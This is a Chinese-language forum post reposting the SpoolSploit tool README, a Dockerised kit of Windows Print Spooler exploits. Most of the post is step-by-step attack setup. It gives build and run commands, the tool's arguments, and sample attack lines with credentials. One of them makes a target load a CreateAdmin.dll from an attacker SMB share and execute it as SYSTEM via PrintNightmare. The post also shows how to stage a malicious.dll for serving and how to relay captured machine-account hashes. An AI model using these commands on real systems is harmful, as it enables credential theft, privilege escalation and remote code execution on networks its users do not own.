DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 3612|回复: 0

[工具] SpoolSploit

[复制链接]

188

主题

35

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
354
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2023-1-6 16:02:57 | 显示全部楼层 |阅读模式

一组 Windows 打印后台处理程序利用与其他实用程序容器化以进行实际利用。

概要


SpoolSploit 是 Windows 打印后台处理程序漏洞的集合,与其他实用程序容器化以进行实际利用。一些非常有效的方法是中继机器帐户凭据以提升权限并在具有完全系统访问权限的终端上执行恶意 DLL。



开始


截至发布之日,SpoolSploit Docker 容器已在最新版本的 MacOS、Ubuntu Linux 和 Windows 10 上成功测试。

虽然不是必需的,但如果想在 SpoolSploit 容器中托管恶意 DLL 或进行凭证中继攻击,应该确保 445 端口未在运行 Docker 的主机上使用。在 Windows 主机上运行此容器时,这种情况最为普遍,因为它默认使用 445 端口。如果在主机上禁用 445 端口不切实际,那没关系! 可以简单地在网络适配器配置为桥接模式的虚拟机中运行 docker 容器。这将允许提供恶意 DLL 和中继凭据。如果只想提供恶意 DLL,可以简单地将 DLL 托管在主机操作系统上的匿名访问共享或受感染的服务器共享上。

创建和访问 SpoolSploit Docker 容器


1、克隆这个存储库

  1. git clone https://github.com/BeetleChunks/SpoolSploit
复制代码

2、构建 SpoolSploit Docker 容器镜像

  1. cd SpoolSploit
  2. sudo docker build -t spoolsploit .
复制代码

3、创建并启动 SpoolSploit Docker 容器

  1. sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest
复制代码

4、附加到容器

  1. sudo docker exec -it spoolsploit /bin/bash
复制代码

命令行参数


  1. usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD

  2. optional arguments:
  3.   -h, --help            show this help message and exit
  4.   -a {spoolsample,nightmare}, --attack {spoolsample,nightmare}
  5.                         Attack type to execute on target(s).
  6.   -rH RHOST, --rhost RHOST
  7.                         Remote target IP, CIDR range, or filename (file:<path>)
  8.   -rP {139,445}, --rport {139,445}
  9.                         Remote SMB server port.
  10.   -lH LHOST, --lhost LHOST
  11.                         Listening hostname or IP
  12.   -lS LSHARE, --lshare LSHARE
  13.                         Staging SMB share (UNC)
  14.   -d DOMAIN, --domain DOMAIN
  15.                         Domain for authentication
  16.   -u USER, --username USER
  17.                         Username for authentication
  18.   -p PASSWD, --password PASSWD
  19.                         Password for authentication

  20. Example - spoolsample:
  21.   python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

  22. Example - nightmare:
  23.   python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10
复制代码

SpoolSample - 捕获并中继 Windows 机器帐户凭据


SpoolSploit Docker 容器包括 Responder,用于中继从在 SpoolSploit 中执行 spoolsample 攻击获得的机器帐户哈希值。由于有几篇很棒的文章详细介绍了中继特权机器帐户凭据以进行特权升级的过程,因此我不会在这里详细介绍这些细节。



PrintNightmare (CVE-2021-1675) - 以 SYSTEM 身份在 Windows 目标上执行恶意 DLL


SpoolSploit 容器中包含一个通过 Impacket 实现的 SMB 服务器,在 SpoolSploit 中执行 printnightmare 攻击时,此服务器可用于托管恶意 DLL。默认的 SMB 服务器设置有效,但如果想自定义它们,可以修改位于 /home/dlogmas/smbserver/smb-v1.conf 的配置文件。

唯一需要做的就是将 DLL 复制到 SpoolSploit 容器中 SMB 服务器的共享文件夹。容器中的共享路径为 /home/dlogmas/smbserver/share/。以下命令演示了如何将 DLL 上传到 SpoolSploit 容器并使其可供 SMB 服务器访问。

  1. sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/
  2. sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll'
复制代码



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 (吉沃科技) ( 京ICP备2021005070号 )

GMT+8, 2024-11-21 22:07 , Processed in 0.059843 second(s), 25 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表